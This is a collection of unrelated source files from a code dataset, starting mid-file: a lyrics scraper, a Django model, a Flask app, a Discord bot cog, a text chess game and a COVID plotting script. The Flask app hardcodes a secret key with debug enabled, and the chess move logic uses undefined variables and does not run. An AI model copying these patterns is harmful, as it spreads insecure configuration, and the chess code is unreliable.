db.getSongArtistCount(self._artist)\n if songs_in_db > 0:\n artistFreq = ArtistFrequency(self._artist, db.getSongFrequency(self._artist))\n artistFreq.createArtistLevelWordFrequency()\n\n def scrape_lyrics(self, url):\n web_page = requests.get(url)\n html = bs(web_page.text, 'html.parser')\n [h.extract() for h in html('script')]\n lyrics = html.find('div', class_='lyrics').get_text()\n return lyrics\n\n def write_to_dir(self, lyrics, song, artist):\n # remove special characters from artist and song\n artist = artist.replace('/', '')\n song = re.sub('[^a-zA-Z0-9 \\n\\.]', '', song)\n\n if os.path.isdir('../lyrics_dir/{}'.format(artist)):\n path_name = '../lyrics_dir/{}/{}.txt'.format(artist, song)\n self.write_txt_file(lyrics, song, artist, path_name)\n fc = FrequencyCreator(path_name)\n frequency = fc.process_lyrics()\n song_frequency = {'artist': artist, 'song': song, 'lyrics_freq': frequency}\n db = Mongo('lyrics-db')\n db.saveSongFrequency(song_frequency)\n else:\n os.makedirs('../lyrics_dir/{}'.format(artist))\n path_name = '../lyrics_dir/{}/{}-{}.txt'.format(artist, song, artist)\n self.write_txt_file(lyrics, song, artist, path_name)\n\n def write_txt_file(self, lyrics, song, artist, path):\n f = open(path, 'w')\n f.write('Song: {}'.format(song) + '\\n')\n f.write('Artist: {}'.format(artist) + '\\n')\n f.write(lyrics)\n f.close()\n","sub_path":"main/finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"368106996","text":"# -*- coding: utf-8 -*-\nfrom django.utils.encoding import force_unicode\nfrom django.db import models\nfrom rest_framework import serializers\nfrom api.models.brand import Brand\n\n\nclass Product(models.Model):\n\n PRODUCT_TYPES = (('coat','Coat'),('dress','Dress'),('jacket','Jacket'),('longsleeve','Longsleeve'),('overall', 'Overall'),('pullover','Pullover'),('shirt','Shirt'),\n ('skirt','Skirt'),('trousers','Trousers'),('bag', 'Bag'),('accessory', 'Accessory'),('shoes', 'Shoes'),('other','Other'))\n GENDER = (('women','Women'),('men','Men'),('unisex','unisex'),)\n\n created = models.DateTimeField(auto_now_add=True, blank=False)\n updated = models.DateTimeField(auto_now_add=True, blank=True)\n is_active = models.BooleanField(default=True, blank=True)\n\n brand = models.ForeignKey(Brand, default=1, blank=False)\n name = models.CharField(max_length=50, blank=False)\n type = models.CharField(max_length=50, choices=PRODUCT_TYPES, blank=False)\n target_group = models.CharField(max_length=6, default='unisex', choices=GENDER, blank=False)\n description_de = models.TextField(max_length=500, blank=True, verbose_name='German description')\n description_en = models.TextField(max_length=500, blank=True, verbose_name='English description')\n description_it = models.TextField(max_length=500, blank=True, verbose_name='Italian description')\n\n def __unicode__(self):\n return force_unicode('%s %s %s %s' % (self.brand, self.type.title(), self.name, self.target_group))\n\n class Meta:\n ordering = ('-created',)\n app_label = 'api'\n verbose_name = 'Product'\n verbose_name_plural = 'Products'\n\n\nclass Product_serializer(serializers.HyperlinkedModelSerializer):\n\n def __unicode__(self):\n return self.id\n\n class Meta:\n model = Product\n fields = (\n 'created',\n 'updated',\n 'is_active',\n 'name',\n 'type',\n 'target_group',\n 'description_de',\n 'description_en',\n 'description_it'\n )\n","sub_path":"api/models/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"512940602","text":"import sys\nimport os\nfrom tqdm import *\nfrom multiprocessing import Pool\n\n#p = Pool(10)\n\n# split, stat, data, pdf_printer\nstages = [False, False, False, False]\n\nif \"all\" in sys.argv:\n stages = [True, True, True, True]\nelse:\n for i in range(1, 5):\n if str(i) in sys.argv:\n stages[i-1] = True\n\ndef filedelete(fname):\n if os.path.exists(fname):\n os.remove(fname)\n\nparameter = list(filter(lambda x: x.endswith(\".csv\"), sys.argv[1:]))[0]\n\naddon = list(filter(lambda x: x != \"all\" and len(x) > 1 and not x.endswith(\".csv\"), sys.argv[1:]))[0]\n\n# split\nif stages[0]:\n os.system(\"python3 split.py \"+parameter+\" \"+addon)\n print(\"Stage 1 (split) done.\")\nelse:\n print(\"Stage 1 (split) skipped.\")\n\n# stat\nif stages[1]:\n def run_stat(filename):\n os.system(\"python3 stat.py data\" + addon + \"/\" + filename + \" \" + addon)\n _, _, fn = next(os.walk(\"data\"+addon))\n for f in tqdm(fn):\n run_stat(f)\n #p.map(run_stat, fn)\n print(\"Stage 2 (stat) done.\")\nelse:\n print(\"Stage 2 (stat) skipped.\")\n\n# data\nif stages[2]:\n filedelete(\"results\"+addon+\"/all-data.csv\")\n filedelete(\"results\"+addon+\"/pdf-params.csv\")\n filedelete(\"results\"+addon+\"/pdf-params-double.csv\")\n filedelete(\"results\"+addon+\"/gamma-pdf-params.csv\")\n def run_data(filename):\n if \"-acc-data.csv\" not in filename:\n return\n os.system(\"python3 data.py results\"+addon+\"/\" + filename + \" \" + addon)\n _, _, fn = next(os.walk(\"results\"+addon))\n for f in tqdm(fn):\n run_data(f)\n #p.map(run_data, fn)\n os.chdir(\"results\" + addon)\n os.system(\"../combine.sh\")\n os.chdir(\"..\")\n print(\"Stage 3 (data) done.\")\nelse:\n print(\"Stage 3 (data) skipped.\")\n\n# pdf_printer\nif stages[3]:\n os.system(\"python3 pdf_printer.py \"+addon)\n print(\"Stage 4 (pdf_printer) done.\")\nelse:\n print(\"Stage 4 (pdf_printer) skipped.\")\n\n","sub_path":"modeling/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"35184409","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\n# ============================================================================\n# Copyright (c) 2013-2015 nexB Inc. http://www.nexb.com/ - All rights reserved.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\n\"\"\"\nTool to generate component attribution based on a set of .ABOUTfiles. \n\nOptionally accepts a list (i.e. a subset) of ABOUT file paths to limit the\ngenerated attribution to this subset.\n\"\"\"\n\nfrom __future__ import print_function\n\nfrom about import Collector\nfrom help import MAPPING_HELP\nfrom help import VERBOSITY_HELP\nfrom help import __full_info__\nfrom help import __version_info__\nfrom os.path import abspath\nfrom os.path import basename\nfrom os.path import dirname\nfrom os.path import exists\nfrom os.path import expanduser\nfrom os.path import isdir\nfrom os.path import join\nfrom os.path import normpath\nfrom util import ImprovedFormatter\nfrom util import apply_mappings\nfrom util import extract_zip\n\nimport csv\nimport errno\nimport logging\nimport optparse\nimport os\nimport posixpath\nimport sys\n\n\nLOG_FILENAME = 'error.log'\n\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nhandler.setLevel(logging.CRITICAL)\nhandler.setFormatter(logging.Formatter('%(levelname)s: %(message)s'))\nlogger.addHandler(handler)\nfile_logger = logging.getLogger(__name__ + '_file')\n\ndef get_about_file_paths(abouts):\n \"\"\"\n Return a list of about_file paths given a list of About data dictionaries.\n \"\"\"\n return [row['about_file'] for row in abouts if 'about_file' in row]\n\n\ndef as_about_paths(paths):\n \"\"\"\n Given a list of paths, return a list of paths that point all to .ABOUT files.\n \"\"\"\n normalized_paths = []\n for path in paths:\n if path.endswith('.ABOUT'):\n normalized_paths.append(path)\n else:\n if path.endswith('/'):\n path += basename(dirname(path))\n normalized_paths.append(path + '.ABOUT')\n return normalized_paths\n\n\ndef lower_keys(dicts):\n \"\"\"\n Return a new a list of 'dicts' dictionaries such that all the keys are\n lowercased.\n \"\"\"\n lowered_dicts = []\n for dct in dicts:\n lowered = {}\n for key, value in dct.items():\n lowered[key.lower()] = value\n lowered_dicts.append(lowered)\n return lowered_dicts\n\n\ndef has_about_file_keys(abouts):\n \"\"\"\n Return True if all dicts in a list of About dictionaries have an about_file key.\n \"\"\"\n return all(about.get('about_file') for about in abouts)\n\n\ndef normalize_about_file_paths(abouts):\n \"\"\"\n Update a list of About data dictionaries such that all 'about_file' paths are\n absolute POSIX paths (i.e. prefixed with a POSIX / \"slash\").\n \"\"\"\n for about in abouts:\n about_file_path = about.get('about_file')\n if about_file_path and not about_file_path.startswith(posixpath.sep):\n about['about_file'] = '/' + about_file_path\n return abouts\n\n\nUSAGE_SYNTAX = \"\"\"\\\n can be a file or directory containing ABOUT files.\n is a file path to save the rendered attribution (e.g. .html).\n is an optional .csv file with at least an \"about_file\" column to limit attribution generation to that list.\n\"\"\"\n\n\nTEMPLATE_LOCATION_HELP = \"\"\"\\\nOptional path to a custom template to use for the generating the attribution.\nDefault to 'about_code_tool/templates/default.html'\n\"\"\"\n\nVERIFICATION_HELP = \"\"\"\\\nOptional path to a verification CSV file created from the generated attribution.\n\"\"\"\n\ndef main(parser, options, args):\n overwrite = options.overwrite\n verbosity = options.verbosity\n mapping_config = options.mapping\n template_location = options.template_location\n verification_location = options.verification_location\n\n if options.version:\n print(__full_info__)\n sys.exit(0)\n\n if verbosity == 1:\n handler.setLevel(logging.ERROR)\n elif verbosity >= 2:\n handler.setLevel(logging.WARNING)\n\n if mapping_config:\n if not exists('MAPPING.CONFIG'):\n print(\"ERROR: The 'MAPPING.CONFIG' file does not exist.\")\n sys.exit(errno.EINVAL)\n\n if template_location:\n template_location = abspath(expanduser(template_location))\n if not exists(template_location):\n print('ERROR: The TEMPLATE_LOCATION file does not exist.')\n parser.print_help()\n sys.exit(errno.EINVAL)\n\n if verification_location:\n verification_location = abspath(expanduser(verification_location))\n if not verification_location.endswith('.csv'):\n print('ERROR: The VERIFICATION_LOCATION file path must end with \".csv\".')\n parser.print_help()\n sys.exit(errno.EINVAL)\n if not exists(dirname(verification_location)):\n print('ERROR: The VERIFICATION_LOCATION file parent directory does not exist.')\n parser.print_help()\n sys.exit(errno.EINVAL)\n\n if not len(args) >= 2 or not len(args) < 4:\n print('ERROR: The number of arguments is incorrect.')\n parser.print_help()\n sys.exit(errno.EEXIST)\n\n input_path = args[0]\n output_path = args[1]\n if len(args) == 3:\n component_subset_path = args[2]\n else:\n component_subset_path = \"\"\n\n # TODO: need more path normalization (normpath, expanduser)\n input_path = expanduser(normpath(input_path))\n output_path = expanduser(normpath(output_path))\n\n # Add the following to solve the\n # UnicodeEncodeError: 'ascii' codec can't encode character\n # FIXME: these two lines do not make sense\n reload(sys)\n sys.setdefaultencoding('utf-8') # @UndefinedVariable\n\n if not exists(input_path):\n print('ERROR: does not exist.')\n parser.print_help()\n sys.exit(errno.EEXIST)\n\n if input_path.lower().endswith('.zip'):\n # accept zipped ABOUT files as input\n input_path = extract_zip(input_path)\n\n if isdir(output_path):\n print('ERROR: must be an HTML file, not a directory')\n parser.print_help()\n sys.exit(errno.EISDIR)\n\n # We only support HTML currently\n if not output_path.endswith('.html'):\n print('ERROR: must be an HTML file.')\n parser.print_help()\n sys.exit(errno.EINVAL)\n\n if exists(output_path) and not overwrite:\n print('ERROR: A file at already exists. Select a different file name or use the --overwrite option.')\n parser.print_help()\n sys.exit(errno.EEXIST)\n\n if component_subset_path and not exists(component_subset_path):\n print('ERROR: the CSV file does not exist.')\n parser.print_help()\n sys.exit(errno.EEXIST)\n\n if not exists(output_path) or (exists(output_path) and overwrite):\n collector = Collector(input_path)\n outlist = None\n if not component_subset_path:\n sublist = None\n\n else:\n with open(component_subset_path, 'rU') as inp:\n reader = csv.DictReader(inp)\n abouts = [data for data in reader]\n\n abouts = lower_keys(abouts)\n\n if mapping_config:\n abouts = apply_mappings(abouts)\n\n if not has_about_file_keys(abouts):\n print('ERROR: The required column key \"about_file\" was not found in the CSV file.')\n print('Please use the \"--mapping\" option to map the input keys and verify the mapping information are correct.')\n print('OR, correct the header keys from the component list.')\n parser.print_help()\n sys.exit(errno.EISDIR)\n\n abouts = normalize_about_file_paths(abouts)\n\n sublist = get_about_file_paths(abouts)\n outlist = as_about_paths(sublist)\n\n attrib_str = collector.generate_attribution(template_path=template_location, limit_to=outlist, verification=verification_location)\n errors = collector.get_genattrib_errors()\n\n if attrib_str:\n try:\n with open(output_path, 'w') as f:\n f.write(attrib_str)\n except Exception as e:\n print('An error occurred. Attribution was not generated.')\n print(e)\n\n print('Completed.')\n # Remove the previous log file if exist\n log_path = join(dirname(output_path), LOG_FILENAME)\n if exists(log_path):\n os.remove(log_path)\n\n file_handler = logging.FileHandler(log_path)\n file_logger.addHandler(file_handler)\n for error_msg in errors:\n logger.error(error_msg)\n file_logger.error(error_msg)\n if errors:\n print('%d errors detected.' % len(errors))\n\n else:\n # we should never reach this\n assert False, 'Unsupported option(s).'\n\n\ndef get_parser():\n \"\"\"\n Return a command line options parser.\n \"\"\"\n parser = optparse.OptionParser(\n usage='%prog [options] input_path output_path [component_list]',\n description=USAGE_SYNTAX,\n add_help_option=False,\n formatter=ImprovedFormatter(),\n )\n parser.add_option('-h', '--help', action='help', help='Print this help message and exit.')\n parser.add_option('--version', action='store_true', help='Print the current version and copyright notice and exit')\n parser.add_option('--overwrite', action='store_true', help='Overwrites the file if it exists.')\n parser.add_option('--verbosity', type=int, help=VERBOSITY_HELP)\n parser.add_option('--template_location', type='string', help=TEMPLATE_LOCATION_HELP)\n parser.add_option('--mapping', action='store_true', help=MAPPING_HELP)\n parser.add_option('--verification_location', type='string', help=VERIFICATION_HELP)\n return parser\n\n\nif __name__ == '__main__':\n print(__version_info__)\n parser = get_parser()\n options, args = parser.parse_args()\n main(parser, options, args)\n","sub_path":"about_code_tool/genattrib.py","file_name":"genattrib.py","file_ext":"py","file_size_in_byte":10563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"29677116","text":"import time\n\nimport gevent\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\napp.config.update(dict(\n DEBUG=True,\n SECRET_KEY=('\\xb73?\\xb5\\x83j\\xf7W\\xc1?\\x8f\\xe7'\n '\\xbb\\xa3\\xaf0\\x9d\\x90\\x00l\\xc5\\xe1CM')\n))\n\n\n@app.route(\"/callback\", methods=['POST'])\ndef receiver():\n context = request.get_json()\n print(context)\n return jsonify({\"response\": \"OK!\"})\n\n\n@app.route('/block')\ndef block_view():\n time.sleep(0.1)\n print('block view processing finish')\n return jsonify({\"content\": \"block view ok\"})\n\n\n@app.route('/normal')\ndef normal_view():\n print('normal view processing finish')\n return jsonify({\"content\": \"normal view ok %s \" % time.time()})\n","sub_path":"run-python-web-app/flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"51936714","text":"#!/usr/bin/python3\nimport sys\n\ndef splitdata(data, target, controller):\n arr = []\n dsize = 10976\n bst =''.join(format(ord(x), 'b') for x in data)\n \n while sys.getsizeof(data) > dsize:\n arr.append('{0}{1}{2}'.format(target, controller, bst[:dsize]))\n #arr.append(bst[:dsize])\n bst = bst[dsize:]\n \n arr.append('{0}{1}{2}'.format(target, controller, data))\n #arr.append(bst[:dsize])\n \n return arr\n","sub_path":"Python_scripts/decentralized_vpn/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"133209940","text":"import discord\r\nfrom discord.ext import commands\r\nimport datetime\r\n\r\nclass Info(commands.Cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n\r\n @commands.command(brief=\"provides info about user\")#userinfo embed\r\n async def userinfo(self, ctx, *user):\r\n if(len(ctx.message.mentions)>0):\r\n for user in ctx.message.mentions:\r\n member = user\r\n else: member = ctx.message.author\r\n if member.activity == None: description=\" \"\r\n elif member.activity.type == discord.ActivityType.playing: description=f\"Playing {member.activity.name}\"\r\n elif member.activity.type == discord.ActivityType.streaming: description=f\"Streaming at {member.activity.url}\"\r\n elif member.activity.type == discord.ActivityType.listening:\r\n song = member.activities[0].title\r\n description=f\"Listening to {song}\"\r\n membercolour = member.colour\r\n embed = discord.Embed(title=f\"{str(member)}\",\r\n description=description,\r\n colour=membercolour\r\n )\r\n embed.add_field(name=\"Account created on\",\r\n value=member.created_at.strftime(\"%Y-%m-%d %H:%M\"),\r\n inline=True)\r\n embed.add_field(name=\"Joined this server on\",\r\n value=member.joined_at.strftime(\"%Y-%m-%d %H:%M\"),\r\n inline=True)\r\n embed.set_image(url=member.avatar_url)\r\n await ctx.send(embed=embed)\r\n\r\n def emojifielder(self, amount,emojis, embed):\r\n for i in range(amount):\r\n embed.add_field(name=f\":{emojis[i].name}:\",\r\n value=f\"{emojis[i]}\")\r\n\r\n @commands.command(brief=\"lists emojis of server\")\r\n async def emojis(self, ctx):\r\n emojis = ctx.message.guild.emojis\r\n embed = discord.Embed(title=\"All emojis in this server:\",\r\n description=f\"({len(emojis)})\",\r\n colour=0x35a1bb\r\n )\r\n self.emojifielder(len(emojis), emojis, embed)\r\n await ctx.send(embed=embed)\r\n\r\n @commands.command(brief=\"geeft profiel foto\")#avatar\r\n async def avatar(self, ctx, *user):\r\n if(len(ctx.message.mentions)>0):\r\n for user in ctx.message.mentions:\r\n member = user\r\n else: member = ctx.message.author\r\n await ctx.send(member.avatar_url)\r\n\r\n @commands.command(brief=\"invite link\")\r\n async def invite(self, ctx):\r\n await ctx.send(\"https://discordapp.com/oauth2/authorize?client_id=348563424545865728&scope=bot&permissions=1610050807\")\r\n\r\n @commands.command(brief=\"info van een albert heijn product\")\r\n async def albertheijn(self, ctx):\r\n await ctx.send(\"deze doet het niet want ik ben lui\")\r\n \r\ndef setup(bot):\r\n bot.add_cog(Info(bot))\r\n","sub_path":"SUOP/modules/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"66244034","text":"team = [\",\",\"w\",\"b\"]\nsymbol = [\" \", \"1\", \"B\", \"N\", \"R\", \"Q\", \"K\"]#[\")\",\"S\",\"c\",\"C\"]\n\ndef printBoard(board,board2):\n y = -1\n for x in range (25):\n a = \" \"\n if x % 3 == 0:\n print(\" +-----+-----+-----+-----+-----+-----+-----+-----+\")\n elif (x-1) % 3 == 0:\n y += 1\n print(\" | \",symbol[board[y][0]],\" | \",symbol[board[y][1]],\n \" | \",symbol[board[y][2]],\" | \",symbol[board[y][3]],\n \" | \",symbol[board[y][4]],\" | \",symbol[board[y][5]],\n \" | \",symbol[board[y][6]],\" | \",symbol[board[y][7]],\" |\")\n else:\n print(\" |\", team[board2[y][0]],\" |\",team[board2[y][1]],\n \" |\",team[board2[y][2]],\" |\",team[board2[y][3]],\n \" |\",team[board2[y][4]],\" |\",team[board2[y][5]],\n \" |\",team[board2[y][6]],\" |\",team[board2[y][7]],\" |\")\n pass\n\ndef markBoard(board,board2,row,col,piece,player):\n if board2[row][col] != player:\n board2[row][col] = player\n board[row][col] = piece\n else:\n print(\"space is already occupied.\")\n pass\n\ndef getPlayerMove(board,board2,player):\n while True:\n pr=int(input(\"pieces row\"))\n pc=int(input(\"pieces column\"))\n if board2[pr][pc] != player:\n print(\"you cannot use that piece!\")\n else: \n p = board[pr][pc]\n break\n moves = lglmvs(p, pr, pc, player, team)\n while True:\n try:\n r=int(input(\"new row\"))\n c=int(input(\"new column\"))\n newloc = (r, c)\n if newloc in moves:\n board[pr][pc] = 0\n board2 [pr][pc] = 0\n return (r,c, p)\n except:\n print (\"invalid!\")\n\ndef hasKings(board):\n m = 0\n for row in board:\n for space in row:\n if space == 6:\n m = m + 1\n if m == 2:\n return True\n else:\n return False\n\ndef lglmvs(piece, cx, cy, player, team):\n moves=[\"cancel\"]\n print (cx,cy)\n if piece == 1:\n moves.append(Pawn(cx,cy,moves, team, player))\n elif piece == 2:\n moves.append(Bishop(cx,cy,moves, team))\n elif piece == 3:\n moves.append(Knight(cx,cy,moves, team))\n elif piece == 4:\n moves.append(Rook(cx,cy,moves, team))\n elif piece == 5:\n moves.append(Rook(cx,cy,moves, team) + Bishop(cx,cy,moves, team))\n elif piece == 6:\n moves.append(King(cx,cy,moves, team))\n return moves\n\ndef Pawn (cx, cy, moves, team, player):\n i = -1**int(player)\n if validspace(cx+i,cy+1, team) == \"Enemy\":\n moves.append((nx, ny))\n if validspace(cx+i,cy-1, team) == \"Enemy\":\n moves.append((nx, ny))\n if validspace(cx+i,cy, team) == True:\n moves.append((nx, ny))\n return moves\n\ndef King (cx, cy, moves, team):\n if validspace(cx+1,cy+1, team) == \"Enemy\" or validspace(cx+1,cy+1, team) == True:\n moves.append((nx, ny))\n if validspace(cx-1,cy+1, team) == \"Enemy\" or validspace(cx-1,cy+1, team) == True:\n moves.append((nx, ny))\n if validspace(cx+1,cy-1, team) == \"Enemy\" or validspace(cx+1,cy-1, team) == True:\n moves.append((nx, ny))\n if validspace(cx-1,cy-1, team) == \"Enemy\" or validspace(cx-1,cy-1, team) == True:\n moves.append((nx, ny))\n if validspace(cx,cy+1, team) == \"Enemy\" or validspace(cx,cy+1, team) == True:\n moves.append((nx, ny))\n if validspace(cx-1,cy, team) == \"Enemy\" or validspace(cx-1,cy, team) == True:\n moves.append((nx, ny))\n if validspace(cx+1,cy, team) == \"Enemy\" or validspace(cx+1,cy, team) == True:\n moves.append((nx, ny))\n if validspace(cx,cy-1, team) == \"Enemy\" or validspace(cx,cy-1, team) == True:\n moves.append((nx, ny))\n for (nx,ny) in moves:\n if checktest(cx, cy, nx, ny, team) == True:\n del moves[i + 1]\n return moves\n\ndef Knight (cx, cy, moves, team):\n if validspace(cx+1,cy+2, team) == \"Enemy\" or validspace(cx+1,cy+2, team) == True:\n moves.append((nx, ny))\n if validspace(cx-1,cy+2, team) == \"Enemy\" or validspace(cx-1,cy+2, team) == True:\n moves.append((nx, ny))\n if validspace(cx+1,cy-2, team) == \"Enemy\" or validspace(cx+1,cy-2, team) == True:\n moves.append((nx, ny))\n if validspace(cx-1,cy-2, team) == \"Enemy\" or validspace(cx-1,cy-2, team) == True:\n moves.append((nx, ny))\n if validspace(cx+2,cy+1, team) == \"Enemy\" or validspace(cx+2,cy+1, team) == True:\n moves.append((nx, ny))\n if validspace(cx-2,cy+1, team) == \"Enemy\" or validspace(cx-2,cy+1, team) == True:\n moves.append((nx, ny))\n if validspace(cx+2,cy-1, team) == \"Enemy\" or validspace(cx+2,cy-1, team) == True:\n moves.append((nx, ny))\n if validspace(cx-2,cy-1, team) == \"Enemy\" or validspace(cx-2,cy-1, team) == True:\n moves.append((nx, ny))\n return moves\n \ndef Bishop (cx, cy, moves, team):\n for i in range (cx, 7):\n if validspace(i, cy+i, team) == \"Enemy\":\n moves.append((nx, ny))\n break\n elif validspace(i, cy+i, team) == True:\n moves.append((nx, ny))\n elif validspace(i, cy+i, team) == False:\n break\n for i in range (cx, 0, -1):\n if validspace(i, cy-i, team) == \"Enemy\":\n moves.append((nx, ny))\n break\n elif validspace(i, cy-i, team) == True:\n moves.append((nx, ny))\n elif validspace(i, cy-i, team) == False:\n break\n for i in range (cy, 7):\n if validspace(cx-i, i, team) == \"Enemy\":\n moves.append((nx, ny))\n break\n elif validspace(cx-i, i, team) == True:\n moves.append((nx, ny))\n elif validspace(cx-i, i, team) == False:\n break\n for i in range (cy, 0, -1):\n if validspace(cx+i, i, team) == \"Enemy\":\n moves.append((nx, ny))\n break\n elif validspace(cx+i, i, team) == True:\n moves.append((nx, ny))\n elif validspace(cx+i, i, team) == False:\n break\n return moves\n\ndef Rook(cx,cy, moves, team):\n for i in range (cx, 7):\n if validspace(i, cy, team) == \"Enemy\":\n moves.append((nx, ny))\n break\n elif validspace(i, cy, team) == True:\n moves.append((nx, ny))\n elif validspace(i, cy, team) == False:\n break\n for i in range (cx, 0, -1):\n if validspace(i, cy, team) == \"Enemy\":\n moves.append((nx, ny))\n break\n elif validspace(i, cy, team) == True:\n moves.append((nx, ny))\n elif validspace(i, cy, team) == False:\n break\n for i in range (cy, 7):\n if validspace(cx, i, team) == \"Enemy\":\n moves.append((nx, ny))\n break\n elif validspace(cx, i, team) == True:\n moves.append((nx, ny))\n elif validspace(cx, i, team) == False:\n break\n for i in range (cy, 0, -1):\n if validspace(cx, i, team) == \"Enemy\":\n moves.append((nx, ny))\n break\n elif validspace(cx, i, team) == True:\n moves.append((nx, ny))\n elif validspace(cx, i, team) == False:\n break\n return moves\n \ndef validspace(nx, ny, team):\n if nx < 0 or nx > 7 or ny < 0 or ny > 7:\n return False\n elif team[nx][ny] == 0:\n return True\n elif team [nx][ny] == player:\n return False\n elif team[nx][ny] != player:\n return \"Enemy\"\n \ndef checktest(cx, cy, nx, ny, team):\n tests = team[cx][cy] % 2 + 1\n for i in board2[row][col]:\n if board2[row][col] == tests:\n dsquares = lglmvs(board[row][col], row, col)\n if (nx,ny) in dsquares:\n return True\n else:\n return False\n \n\ndef main():\n board = [[4,3,2,5,6,2,3,4],\n [1,1,1,1,1,1,1,1],\n [0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0],\n [1,1,1,1,1,1,1,1],\n [4,3,2,5,6,2,3,4]]\n \n board2 = [[2,2,2,2,2,2,2,2],\n [2,2,2,2,2,2,2,2],\n [0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0],\n [0,0,0,0,0,0,0,0],\n [1,1,1,1,1,1,1,1],\n [1,1,1,1,1,1,1,1]]\n player = 1\n while hasKings(board):\n printBoard(board,board2)\n row,col,piece = getPlayerMove(board,board2,player)\n markBoard(board,board2,row,col,piece,player)\n player = player % 2 + 1 \n printBoard(board,board2)\n player = player % 2 + 1\n print (\"player \"+str(player)+\" wins!\")\nmain()\n\n##############################################################################\n\n#card table (future)\n #GhostForm\n #Wololo\n #Charge\n #RoyalMarriage\n #Resurection\n #Archery\n #Knighting\n #Draft\n #Faith\n #Rookerie\n #SummonDragon\n #Teleport\n #Chivalry\n \n\n\n\n","sub_path":"chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":8934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"638475266","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.colors\nimport matplotlib.dates as mdates\nimport datetime\nimport os\nimport seaborn as sns\nimport codes.utils as cutil\n\n# save the figure here\nsave_fig = True\nfig_dir = cutil.HOME / 'results' / 'figures' / 'fig4'\nfig_dir.mkdir(parents=True, exist_ok=True)\nfig_name = 'fig4.pdf'\n\n# for nice exporting to illustrator\nmatplotlib.rcParams['pdf.fonttype'] = 42\n\n# figure aesthetics\nno_policy_color = 'red'\npolicy_color = 'blue'\nmatplotlib.rcParams['font.sans-serif'] = \"Arial\"\nmatplotlib.rcParams['font.family'] = \"sans-serif\"\n\n# column indices for prediction data\npred_no_pol_key = 'predicted_cum_confirmed_cases_no_policy'\npred_pol_key = 'predicted_cum_confirmed_cases_true'\n\ndata_dir = cutil.DATA / 'post_processing'\nfn_template = os.path.join(data_dir,'{0}_bootstrap_projection.csv')\n\ncountries_in_order = ['china','korea', 'italy', 'iran', 'france', 'usa']\n\ncountry_names = {\n 'france':'France', 'iran':\"Iran\",'usa':\"United States\", 'italy': \"Italy\", 'china':'China', 'korea':'South Korea'\n \n}\n\n\ndef color_add_alpha(color,alpha):\n color_rgba = list(matplotlib.colors.to_rgba(color))\n color_rgba[3] = alpha\n return color_rgba\n\n\ndef plot_quantiles(ax, quantiles, quantiles_dict, legend_dict, model, update_legend):\n if ax is None:\n fig, ax = plt.subplots(figsize=(10,10))\n\n dates = quantiles_dict['dates']\n \n quantiles_no_policy = quantiles_dict['quantiles_no_policy']\n quantiles_policy = quantiles_dict['quantiles_policy']\n \n if not model is None:\n dates_model = pd.to_datetime(model['date'])\n preds_policy = model['predicted_cum_confirmed_cases_true']\n preds_no_policy = model['predicted_cum_confirmed_cases_no_policy']\n\n num_ranges = int(len(quantiles)/2)\n\n upper_idx = -1\n lower_idx = 0\n \n # inner to outer - hardcode for now\n alphas_fc = [0.2,.5]\n alphas_ec = [0.4,.9]\n \n if not model is None:\n model_no_pol = ax.plot(dates_model, preds_no_policy, color=no_policy_color,\n lw=5, ls='--')\n \n if update_legend:\n legend_dict['lines'].append(model_no_pol[0])\n legend_dict['labels'].append('\"No policy\" scenario')\n\n for i in range(num_ranges):\n if i >= 0:\n l_no_pol = ax.fill_between(pd.to_datetime(dates), \n quantiles_no_policy[:,lower_idx], \n quantiles_no_policy[:,upper_idx], \n facecolor=color_add_alpha(no_policy_color, alphas_fc[i]),\n # edgecolor=color_add_alpha(no_policy_color, alphas_ec[i]),\n # alpha = alphas_fc[i],\n )\n \n if update_legend:\n legend_dict['lines'].append(l_no_pol)\n legend_dict['labels'].append('{0}% interval'.format(\n int(100*(quantiles[upper_idx]- quantiles[lower_idx]))))\n \n lower_idx += 1\n upper_idx -= 1\n \n \n if not model is None:\n model_pol = ax.plot(dates_model, preds_policy, color=policy_color,\n lw=5, ls='--')\n\n if update_legend:\n legend_dict['lines'].append(model_pol[0])\n legend_dict['labels'].append('Actual policies (predicted)')\n \n \n # reset \n upper_idx = -1\n lower_idx = 0\n \n for i in range(num_ranges):\n if i >= 0: \n l_pol = ax.fill_between(pd.to_datetime(dates), \n quantiles_policy[:,lower_idx], \n quantiles_policy[:,upper_idx], \n facecolor=color_add_alpha(policy_color, alphas_fc[i]),\n # 